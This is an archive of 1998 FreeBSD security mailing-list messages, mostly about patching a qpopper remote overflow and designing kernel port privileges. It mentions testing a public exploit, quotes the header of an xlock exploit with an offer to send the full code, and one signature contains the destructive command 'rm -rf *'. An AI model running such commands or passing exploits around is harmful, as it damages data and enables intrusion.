> > Belen Consolidated Schools
> > Belen, NM
> > (505) 861-4981
> > pager: (505) 875-8866
>
> --
> Brian
>
> Don't _EVER_ lose your sense of humour....

-===================================================================-
Jeremy Shaffner                    JORSM Internet
Senior Technical Support           Northwest Indiana's Premium
jer@jorsm.com                      Internet Service Provider
support@jorsm.com                  http://www.jorsm.com
-===================================================================-

From owner-freebsd-security Tue Jun 30 13:15:40 1998
Date: Tue, 30 Jun 1998 13:15:38 -0700 (PDT)
Organization: MediaCity World
From: Nicole
To: Jeremy Shaffner
Subject: Re: Remote exploit in qpopper.
Cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG, brian@FreeBSD.ORG, Sasha Egan , Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30-Jun-98 Jeremy Shaffner wrote: > > There is also a new version released today from Qualcomm. 2.5 is > patched against all known problems. > ftp://ftp.qualcomm.com/eudora/servers/popper/. > I just tried to go there and the eudora directory doesn't exist. i also tried their other reccoemnded site. Anyone know of alternate sites? Nicole > > FWIW, I compiled the exploit (known as qpush or qpop) and tried it on an > unpatched 2.41beta1. Although it did cause a overflow and popper exited > with a signal 11, it did not provide a root shell. The author of this > particular exploit (It's available on the bugtraq list or from rootshell) > says that it only works on 2.2 or 2.41b1 and only on Linux systems. (The > exploit itself can be run from any platform.) > > The patches that Jordan has made do work. You can get the new -current > port and build that, or get 2.5 from qualcomm and build it yourself. > > On Tue, 30 Jun 1998, Brian Somers wrote: > >> > >> > Hey Brian, >> > I dunno if you have been watching some of the lists but there is some >> > definate problems in Qualcom's popper... >> [.....] >> >> Looks like I spoke too soon. A pile of patches have now been made to >> popper :-) >> >> > Sasha Egan >> > Belen Consolidated Schools >> > Belen, NM >> > (505) 861-4981 >> > pager: (505) 875-8866 >> >> -- >> Brian , , >> >> Don't _EVER_ lose your sense of humour.... 
>>
>>
>>
>> To Unsubscribe: send mail to majordomo@FreeBSD.org
>> with "unsubscribe freebsd-questions" in the body of the message
>>
>
>
> -===================================================================-
> Jeremy Shaffner                          JORSM Internet
> Senior Technical Support                 Northwest Indiana's Premium
> jer@jorsm.com                            Internet Service Provider
> support@jorsm.com                        http://www.jorsm.com
> -===================================================================-
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe security" in the body of the message

   |\ __ /|   (`\
   | o_o |__  ) )
  //     \\
 Nicole Harrington | SR Systems Administrator
-------------------(((---(((-----------------------
 nicole@mediacity.com  -  nicole@ispchannel.com
 www.mediacity.com     -  www.ispchannel.com
 Phone: 650-237-1464   -  Pager: 415-301-2482

 Powered By Coca-Cola and FreeBSD

 Why do doctors call what they do practice?
 Microsoft: What bug would you like today?
----------------------------------------------------

From owner-freebsd-security Tue Jun 30 14:02:30 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA04395 for freebsd-security-outgoing; Tue, 30 Jun 1998 14:02:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mercury.jorsm.com (mercury.jorsm.com [207.112.128.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA04295; Tue, 30 Jun 1998 14:01:32 -0700 (PDT) (envelope-from jer@jorsm.com)
Received: from localhost (jer@localhost) by mercury.jorsm.com (8.8.7/8.8.7) with SMTP id QAA16663; Tue, 30 Jun 1998 16:01:17 -0500 (CDT)
Date: Tue, 30 Jun 1998 16:01:16 -0500 (CDT)
From: Jeremy Shaffner
To: Nicole
cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG, brian@FreeBSD.ORG, Sasha Egan , Brian Somers
Subject: Re: Remote exploit in qpopper.
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Heh..the bastards...They changed it to oldeudora. They could have done that
before mailing me with the URL I gave you.

On Tue, 30 Jun 1998, Nicole wrote:

>
> On 30-Jun-98 Jeremy Shaffner wrote:
> >
> > There is also a new version released today from Qualcomm. 2.5 is
> > patched against all known problems.
> > ftp://ftp.qualcomm.com/eudora/servers/popper/.
> >
>
>
> I just tried to go there and the eudora directory doesn't exist. I also tried
> their other recommended site. Anyone know of alternate sites?
>
>
> Nicole
>
>
> >
> > FWIW, I compiled the exploit (known as qpush or qpop) and tried it on an
> > unpatched 2.41beta1. Although it did cause an overflow and popper exited
> > with a signal 11, it did not provide a root shell. The author of this
> > particular exploit (It's available on the bugtraq list or from rootshell)
> > says that it only works on 2.2 or 2.41b1 and only on Linux systems. (The
> > exploit itself can be run from any platform.)
> >
> > The patches that Jordan has made do work. You can get the new -current
> > port and build that, or get 2.5 from qualcomm and build it yourself.
> >
> > On Tue, 30 Jun 1998, Brian Somers wrote:
> >
> >> >
> >> > Hey Brian,
> >> > I dunno if you have been watching some of the lists but there are some
> >> > definite problems in Qualcom's popper...
> >> [.....]
> >>
> >> Looks like I spoke too soon. A pile of patches have now been made to
> >> popper :-)
> >>
> >> > Sasha Egan
> >> > Belen Consolidated Schools
> >> > Belen, NM
> >> > (505) 861-4981
> >> > pager: (505) 875-8866
> >>
> >> --
> >> Brian , ,
> >>
> >> Don't _EVER_ lose your sense of humour....
> >>
> >>
> >>
> >> To Unsubscribe: send mail to majordomo@FreeBSD.org
> >> with "unsubscribe freebsd-questions" in the body of the message
> >>
> >
> >
> > -===================================================================-
> > Jeremy Shaffner                          JORSM Internet
> > Senior Technical Support                 Northwest Indiana's Premium
> > jer@jorsm.com                            Internet Service Provider
> > support@jorsm.com                        http://www.jorsm.com
> > -===================================================================-
> >
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe security" in the body of the message
>
>    |\ __ /|   (`\
>    | o_o |__  ) )
>   //     \\
>  Nicole Harrington | SR Systems Administrator
> -------------------(((---(((-----------------------
>
>  nicole@mediacity.com  -  nicole@ispchannel.com
>  www.mediacity.com     -  www.ispchannel.com
>  Phone: 650-237-1464   -  Pager: 415-301-2482
>
>  Powered By Coca-Cola and FreeBSD
>
>  Why do doctors call what they do practice?
>  Microsoft: What bug would you like today?
> ----------------------------------------------------
>

-===================================================================-
Jeremy Shaffner                          JORSM Internet
Senior Technical Support                 Northwest Indiana's Premium
jer@jorsm.com                            Internet Service Provider
support@jorsm.com                        http://www.jorsm.com
-===================================================================-

From owner-freebsd-security Tue Jun 30 15:11:06 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA14604 for freebsd-security-outgoing; Tue, 30 Jun 1998 15:11:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from andrsn.stanford.edu (root@andrsn.Stanford.EDU [36.33.0.163]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA14595 for ; Tue, 30 Jun 1998 15:11:02 -0700 (PDT) (envelope-from andrsn@andrsn.stanford.edu)
Received: from localhost (andrsn@localhost.stanford.edu [127.0.0.1]) by andrsn.stanford.edu (8.8.8/8.6.12) with SMTP id PAA06961; Tue, 30 Jun 1998 15:10:00 -0700 (PDT)
Date: Tue, 30 Jun 1998 15:10:00 -0700 (PDT)
From: Annelise Anderson
To: Johann Visagie
cc: security@internet.org.za, security@FreeBSD.ORG
Subject: Re: New Qpopper released to fix hole
In-Reply-To: <19980630182358.B1060@cityip.co.za>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 30 Jun 1998, Johann Visagie wrote:

>
> ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper2.5.tar.Z

I cvsupped ports and tried to make install qpopper2.5. It cannot find
this distfile, which turns out to be in "oldeudora" rather than "eudora".
It is also not on ftp.freebsd.org, at least not in the directory where
the port tries to find it.
Since this vulnerability was announced I have a bunch of messages about
people trying to use popper who don't have accounts on my machine (I'm
the only person who has an account).

Annelise

P.S. It installed, but the binary /usr/local/libexec/popper is a
different size from the one in the src directory in /usr/ports. I do
find that a little odd.

> Read the README in the same directory for more info.
>
> -- V
>
> Johann Visagie | Email: wjv@CityIP.co.za | Tel: +27 21 419-7878
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe security" in the body of the message
>

From owner-freebsd-security Tue Jun 30 16:09:07 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA26602 for freebsd-security-outgoing; Tue, 30 Jun 1998 16:09:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail001.mediacity.com (mail001.mediacity.com [205.216.172.9]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id QAA26575 for ; Tue, 30 Jun 1998 16:08:56 -0700 (PDT) (envelope-from nicole@mediacity.com)
Received: (qmail 2747 invoked from network); 30 Jun 1998 23:08:51 -0000
Received: from dogbert.mediacity.com (@208.138.36.62) by mail001.mediacity.com with SMTP; 30 Jun 1998 23:08:51 -0000
Message-ID:
X-Mailer: XFMail 1.2 [p0] on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To:
Date: Tue, 30 Jun 1998 16:08:55 -0700 (PDT)
Organization: MediaCity World
From: Nicole
To: Jeremy Shaffner
Subject: Re: Remote exploit in qpopper.
Cc: Brian Somers , Sasha Egan , brian@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 30-Jun-98 Jeremy Shaffner wrote:
> Heh..the bastards...They changed it to oldeudora. They could have done
> that before mailing me with the URL I gave you.
>

Ah ha... Yes, they are on the move, aren't they.. That wasn't there when I
went there... Tap tap tap tap...

Nicole

> On Tue, 30 Jun 1998, Nicole wrote:
>
>>
>> On 30-Jun-98 Jeremy Shaffner wrote:
>> >
>> > There is also a new version released today from Qualcomm. 2.5 is
>> > patched against all known problems.
>> > ftp://ftp.qualcomm.com/eudora/servers/popper/.
>> >
>>
>>
>> I just tried to go there and the eudora directory doesn't exist. I also
>> tried
>> their other recommended site. Anyone know of alternate sites?
>>
>>
>> Nicole
>>
>>
>> >
>> > FWIW, I compiled the exploit (known as qpush or qpop) and tried it on an
>> > unpatched 2.41beta1. Although it did cause an overflow and popper exited
>> > with a signal 11, it did not provide a root shell. The author of this
>> > particular exploit (It's available on the bugtraq list or from rootshell)
>> > says that it only works on 2.2 or 2.41b1 and only on Linux systems. (The
>> > exploit itself can be run from any platform.)
>> >
>> > The patches that Jordan has made do work. You can get the new -current
>> > port and build that, or get 2.5 from qualcomm and build it yourself.
>> >
>> > On Tue, 30 Jun 1998, Brian Somers wrote:
>> >
>> >> >
>> >> > Hey Brian,
>> >> > I dunno if you have been watching some of the lists but there are some
>> >> > definite problems in Qualcom's popper...
>> >> [.....]
>> >>
>> >> Looks like I spoke too soon. A pile of patches have now been made to
>> >> popper :-)
>> >>
>> >> > Sasha Egan
>> >> > Belen Consolidated Schools
>> >> > Belen, NM
>> >> > (505) 861-4981
>> >> > pager: (505) 875-8866
>> >>
>> >> --
>> >> Brian , ,
>> >>
>> >> Don't _EVER_ lose your sense of humour....
>> >>
>> >>
>> >>
>> >> To Unsubscribe: send mail to majordomo@FreeBSD.org
>> >> with "unsubscribe freebsd-questions" in the body of the message
>> >>
>> >
>> >
>> > -===================================================================-
>> > Jeremy Shaffner                          JORSM Internet
>> > Senior Technical Support                 Northwest Indiana's Premium
>> > jer@jorsm.com                            Internet Service Provider
>> > support@jorsm.com                        http://www.jorsm.com
>> > -===================================================================-
>> >
>> >
>> > To Unsubscribe: send mail to majordomo@FreeBSD.org
>> > with "unsubscribe security" in the body of the message
>>
>>    |\ __ /|   (`\
>>    | o_o |__  ) )
>>   //     \\
>>  Nicole Harrington | SR Systems Administrator
>> -------------------(((---(((-----------------------
>>
>>  nicole@mediacity.com  -  nicole@ispchannel.com
>>  www.mediacity.com     -  www.ispchannel.com
>>  Phone: 650-237-1464   -  Pager: 415-301-2482
>>
>>  Powered By Coca-Cola and FreeBSD
>>
>>  Why do doctors call what they do practice?
>>  Microsoft: What bug would you like today?
>> ----------------------------------------------------
>>
>>
>
>
> -===================================================================-
> Jeremy Shaffner                          JORSM Internet
> Senior Technical Support                 Northwest Indiana's Premium
> jer@jorsm.com                            Internet Service Provider
> support@jorsm.com                        http://www.jorsm.com
> -===================================================================-

   |\ __ /|   (`\
   | o_o |__  ) )
  //     \\
 Nicole Harrington | SR Systems Administrator
-------------------(((---(((-----------------------
 nicole@mediacity.com  -  nicole@ispchannel.com
 www.mediacity.com     -  www.ispchannel.com
 Phone: 650-237-1464   -  Pager: 415-301-2482

 Powered By Coca-Cola and FreeBSD

 Why do doctors call what they do practice?
 Microsoft: What bug would you like today?
----------------------------------------------------

From owner-freebsd-security Tue Jun 30 17:44:12 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA13975 for freebsd-security-outgoing; Tue, 30 Jun 1998 17:44:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from the.oneinsane.net (insane@gw.oneinsane.net [207.113.133.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA13933 for ; Tue, 30 Jun 1998 17:43:44 -0700 (PDT) (envelope-from insane@the.oneinsane.net)
Received: (from insane@localhost) by the.oneinsane.net (8.9.0/8.9.0) id RAA25277; Tue, 30 Jun 1998 17:43:36 -0700 (PDT)
Message-ID: <19980630174336.A25206@oneinsane.net>
Date: Tue, 30 Jun 1998 17:43:36 -0700
From: "Ron 'The Insane One' Rosson"
To: Nicole
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Remote exploit in qpopper.
Mail-Followup-To: Nicole , freebsd-security@freebsd.org
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.91.1i
In-Reply-To: ; from Nicole on Tue, Jun 30, 1998 at 01:15:38PM -0700
X-Operating-System: FreeBSD the.oneinsane.net 2.2.6-STABLE
X-Opinion: What you read here is my IMHO
X-Disclaimer: I am a firm believer in RTFM
X-WWW: http://www.oneinsane.net
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Jun 30, 1998 at 01:15:38PM -0700, Nicole wrote:
>
> On 30-Jun-98 Jeremy Shaffner wrote:
> >
> > There is also a new version released today from Qualcomm. 2.5 is
> > patched against all known problems.
> > ftp://ftp.qualcomm.com/eudora/servers/popper/.
> >
>
>
> I just tried to go there and the eudora directory doesn't exist. I also tried
> their other recommended site. Anyone know of alternate sites?
>
>
> Nicole

You are not losing your mind.. I just checked and I don't see it anywhere.
Ron

--
--------------------------------------------------------
Ron Rosson                  ... and a UNIX user said ...
The InSaNe One                       rm -rf *
insane@oneinsane.net         and all was null and void
--------------------------------------------------------
It's so nice to be insane, nobody asks you to explain.

From owner-freebsd-security Tue Jun 30 18:19:46 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA21013 for freebsd-security-outgoing; Tue, 30 Jun 1998 18:19:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from germanium.xtalwind.net (germanium.xtalwind.net [205.160.242.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA20642; Tue, 30 Jun 1998 18:17:39 -0700 (PDT) (envelope-from jack@germanium.xtalwind.net)
Received: from localhost (jack@localhost) by germanium.xtalwind.net (8.9.0/8.9.0) with SMTP id VAA00733; Tue, 30 Jun 1998 21:17:27 -0400 (EDT)
Date: Tue, 30 Jun 1998 21:17:27 -0400 (EDT)
From: jack
To: Nicole
cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG, brian@FreeBSD.ORG
Subject: Re: Remote exploit in qpopper.
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 30 Jun 1998, Nicole wrote:

> On 30-Jun-98 Jeremy Shaffner wrote:
> >
> > There is also a new version released today from Qualcomm. 2.5 is
> > patched against all known problems.
> > ftp://ftp.qualcomm.com/eudora/servers/popper/.
> >
>
>
> I just tried to go there and the eudora directory doesn't exist.

It most certainly does.

drwxrwxr-x  16 17308    2501         2048 Jul  1 00:46 eudora

However there is one component of the path missing in the above.
/eudora/servers/unix/popper
                ^^^^

--------------------------------------------------------------------------
Jack O'Neill                      Systems Administrator / Systems Analyst
jack@germanium.xtalwind.net            Crystal Wind Communications, Inc.
          Finger jack@germanium.xtalwind.net for my PGP key.
   PGP Key fingerprint = F6 C4 E6 D4 2F 15 A7 67  FD 09 E9 3C 5F CC EB CD
              enriched, vcard, HTML messages > /dev/null
       Mail from netcom.com blocked until they stop relaying SPAM
--------------------------------------------------------------------------

From owner-freebsd-security Tue Jun 30 22:32:45 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA27815 for freebsd-security-outgoing; Tue, 30 Jun 1998 22:32:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA27804 for ; Tue, 30 Jun 1998 22:32:38 -0700 (PDT) (envelope-from dima@burka.rdy.com)
Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id WAA17847 for security@FreeBSD.ORG; Tue, 30 Jun 1998 22:32:38 -0700 (PDT)
Message-Id: <199807010532.WAA17847@burka.rdy.com>
Subject: kerberos5
To: security@FreeBSD.ORG
Date: Tue, 30 Jun 1998 22:32:38 -0700 (PDT)
X-Class: Fast
Organization: HackerDome
Reply-To: dima@best.net
From: dima@best.net (Dima Ruban)
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've updated my patches for krb5-1.0.5 for FreeBSD.
New: ftp://ftp.rdy.com/pub/krb5/krb5-1.0.5+freebsd.diff
Old: ftp://ftp.rdy.com/pub/krb5/krb5-1.0.5+freebsd.diff.OLD

-- dima

From owner-freebsd-security Tue Jun 30 22:53:06 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA00392 for freebsd-security-outgoing; Tue, 30 Jun 1998 22:53:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from platon.man.lublin.pl (hero@platon.man.lublin.pl [192.147.37.103]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA00359 for ; Tue, 30 Jun 1998 22:52:50 -0700 (PDT) (envelope-from hero@platon.man.lublin.pl)
Received: from localhost (hero@localhost) by platon.man.lublin.pl (8.8.7/8.8.7) with SMTP id HAA07885 for ; Wed, 1 Jul 1998 07:52:28 +0200
Date: Wed, 1 Jul 1998 07:52:28 +0200 (CEST)
From: Henryk Czapski
To: freebsd-security@FreeBSD.ORG
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

unsubscribe freebsd-security

Henryk Czapski

From owner-freebsd-security Wed Jul 1 00:10:46 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA08249 for freebsd-security-outgoing; Wed, 1 Jul 1998 00:10:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA08241 for ; Wed, 1 Jul 1998 00:10:43 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu)
Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id DAA11586; Wed, 1 Jul 1998 03:08:52 -0400 (EDT)
From: "Allen Smith"
Message-Id: <9807010308.ZM11585@beatrice.rutgers.edu>
Date: Wed, 1 Jul 1998 03:08:52 -0400
In-Reply-To: David Greenman "Re: bsd securelevel patch question" (Jun 24, 8:49pm)
References: <199806250349.UAA08929@implode.root.com>
X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail)
To: dg@root.com, security@FreeBSD.ORG
Cc: njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com, easmith@beatrice.rutgers.edu
Subject: Re: bsd securelevel patch question
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Jun 24, 8:49pm, David Greenman (possibly) wrote:
> I can imagine that the list could be on the order of 32 large.

What about permissions for below-1024 ports? I really don't want to give
an anonymous-only version of ftp the ability to bind to _any_ TCP port,
for instance - that largely defeats the purpose of having a non-root
program able to bind to such ports (namely limiting extra access).

> This is one of the reasons why I don't think that a gid based scheme scales
> very well.
> You'd have to do a search through the fairly large group set each time you
> wanted to check for the capability. Even if we did implement the gid method
> externally, I still think that the kernel internal representation would be
> best handled by a privilege mask.

I can see this reasoning for most privileges... but not for the port
ones. Hmm... how about a specific permission for PRIV_TCP, granted to
any process with a group between x+1 and x+1023, with the port access
granted being port=(group-x)? The same would be for PRIV_UDP. This
would admittedly necessitate a group set scan for the group
corresponding to the requested port. ucred seems to be a logical place
to put a privilege mask.

Incidentally, I goofed on my correcting message, with regard to NFS;
nosuid is of course for the _client_, and the important one in this
case would be an extension of the root translation.

-Allen

P.S. You were mentioning VAXen before; as it happens, I've been a user
on those. Their privilege scheme is something I've had in mind also.

--
Allen Smith
easmith@beatrice.rutgers.edu

From owner-freebsd-security Wed Jul 1 00:23:16 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA09307 for freebsd-security-outgoing; Wed, 1 Jul 1998 00:23:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from Eleet.iele.polsl.gliwice.pl (michalk@eleet.iele.polsl.gliwice.pl [157.158.17.60]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA09300 for ; Wed, 1 Jul 1998 00:23:08 -0700 (PDT) (envelope-from michalk@Eleet.iele.polsl.gliwice.pl)
Received: from localhost (michalk@localhost) by Eleet.iele.polsl.gliwice.pl (8.8.5/8.8.5) with SMTP id JAA10761 for ; Wed, 1 Jul 1998 09:22:59 +0200
Date: Wed, 1 Jul 1998 09:22:58 +0200 (MET DST)
From: Michal Kopijasz
To: freebsd-security@FreeBSD.ORG
Subject: Re: xlock
In-Reply-To: <19980629092005.33214@gil.physik.rwth-aachen.de>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 29 Jun 1998, Christoph Kukulies wrote:

> On Mon, Jun 29, 1998 at 08:58:02AM +0200, Thomas Gellekum wrote:
> > Christoph Kukulies writes:
> >
> > > Alarmed by recent buffer overflow attacks on Linux machines in
> > > my vicinity (an exploit for this is available) I thought about
> > > xlock under FreeBSD and would like to know whether the
> > > security hole has been sorted out under FreeBSD 2.2.x or what
> > > measures are advised to prevent it.
> >
> > Could you tell more about this?
>
> /* x86 XLOCK overflow exploit
>    by cesaro@0wned.org 4/17/97
>
>    Original exploit framework - lpr exploit
>
>    Usage: make xlock-exploit
>           xlock-exploit
>
>    Assumptions: xlock is suid root, and installed in /usr/X11/bin
> */
>
> [complete xploit can be sent on demand]

Can you send it to me?
thanks

Michal; ircNET: mkm ;icq:UIN 14202913; http://elf.univ.waw.pl/~znachor
traceroute to siemianowice.sl.pl      mailto: mordownia@50.ml.org
"Either we will find a way, or we will make one" Hannibal

From owner-freebsd-security Wed Jul 1 00:45:37 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAB11774 for freebsd-security-outgoing; Wed, 1 Jul 1998 00:45:37 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA11747 for ; Wed, 1 Jul 1998 00:45:24 -0700 (PDT) (envelope-from root@implode.root.com)
Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id AAA01700; Wed, 1 Jul 1998 00:44:24 -0700 (PDT)
Message-Id: <199807010744.AAA01700@implode.root.com>
To: "Allen Smith"
cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Subject: Re: bsd securelevel patch question
In-reply-to: Your message of "Wed, 01 Jul 1998 03:08:52 EDT." <9807010308.ZM11585@beatrice.rutgers.edu>
From: David Greenman
Reply-To: dg@root.com
Date: Wed, 01 Jul 1998 00:44:24 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>> You'd have to do a search through the fairly large group set each time you
>> wanted to check for the capability. Even if we did implement the gid method
>> externally, I still think that the kernel internal representation would be
>> best handled by a privilege mask.
>
>I can see this reasoning for most privileges... but not for the port
>ones. Hmm... how about a specific permission for PRIV_TCP, granted to
>any process with a group between x+1 and x+1023, with the port access
>granted being port=(group-x)? The same would be for PRIV_UDP. This
>would admittedly necessitate a group set scan for the group
>corresponding to the requested port. ucred seems to be a logical place
>to put a privilege mask.

   I'll resist any scheme that ties specific privileges to specific gids.
To me it seems too kludgy and I also suspect that most FreeBSD admins will
be quite unhappy about us hijacking a large block of gids for our special
purposes.

>P.S. You were mentioning VAXen before; as it happens, I've been a user
>on those. Their privilege scheme is something I've had in mind
>also.

   Prior to BSD, I operated a two machine VAX/VMS cluster for about 5 years
in my home datacenter (a facility that is next to my home office). :-)

-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project

From owner-freebsd-security Wed Jul 1 05:54:21 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA12732 for freebsd-security-outgoing; Wed, 1 Jul 1998 05:54:21 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA12664 for ; Wed, 1 Jul 1998 05:54:08 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au)
Message-Id: <199807011254.FAA12664@hub.freebsd.org>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA092757590; Wed, 1 Jul 1998 22:53:10 +1000
From: Darren Reed
Subject: Re: bsd securelevel patch question
To: easmith@beatrice.rutgers.edu (Allen Smith)
Date: Wed, 1 Jul 1998 22:53:10 +1000 (EST)
Cc: dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com, easmith@beatrice.rutgers.edu
In-Reply-To: <9807010308.ZM11585@beatrice.rutgers.edu> from "Allen Smith" at Jul 1, 98 03:08:52 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

sigh...the < 1024 port thing keeps coming up. I will try and dig up the
hacks I did to portalfs to provide ACLs for listen sockets.

no stupid extended permissions checks in kernels necessary.

From owner-freebsd-security Wed Jul 1 06:35:12 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA16620 for freebsd-security-outgoing; Wed, 1 Jul 1998 06:35:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA16598 for ; Wed, 1 Jul 1998 06:35:04 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au)
Message-Id: <199807011335.GAA16598@hub.freebsd.org>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA096010059; Wed, 1 Jul 1998 23:34:19 +1000
From: Darren Reed
Subject: Re: bsd securelevel patch question
To: avalon@coombs.anu.edu.au (Darren Reed)
Date: Wed, 1 Jul 1998 23:34:18 +1000 (EST)
Cc: easmith@beatrice.rutgers.edu, dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
In-Reply-To: <199807011254.FAA12664@hub.freebsd.org> from "Darren Reed" at Jul 1, 98 10:53:10 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In some mail from Darren Reed, sie said:
>
>
> sigh...the < 1024 port thing keeps coming up. I will try and dig up the
> hacks I did to portalfs to provide ACLs for listen sockets.
>
> no stupid extended permissions checks in kernels necessary.

well, I dug it up, and it's not really pretty, but it does prove it is
possible. the way I set it up to work was to read in the directory
structure prior to mount_portal taking it over and then use the file
perms in that for access control. this was just an experiment.
a better way to do it is to have a separate configuration file for the
